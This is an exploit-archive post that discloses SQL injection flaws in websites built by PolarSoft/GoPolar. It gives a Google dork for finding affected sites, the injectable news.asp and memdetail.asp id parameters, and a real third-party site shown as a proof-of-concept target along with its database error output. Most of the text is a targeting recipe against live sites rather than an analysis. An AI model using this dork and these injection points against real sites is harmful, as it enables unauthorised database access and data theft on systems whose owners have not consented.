#################################################################################################
# Exploit Title : Website Design PolarSoft® Inc. GoPolar SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 03/06/2018
# Vendor Homepages : polarsoft.com ~ gopolar.com ~ templated.co
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Description : Polarsoft is a creative team of design and development professionals who apply advanced technology to solve complex communications problems.
PolarSoft team brings together decades of deep experience in human-interface design, distributed object-oriented databases, direct digital control (DDC), networking and real-time systems.
PolarSoft is the largest independent supplier of BACnet software products worldwide.
# Google Dork : intext:''website design: PolarSoft® Inc.''
# Exploit : /news.asp?id=[SQL Injection]
# Exploit : /memdetail.asp?id=[SQL Injection]
#################################################################################################
# Example Site => dfi.org/news.asp?id=193%27 => [ Proof of Concept ] => archive.is/BCoTV
# SQL-DB Error =>
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'id=193''.
/news.asp, line 193
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################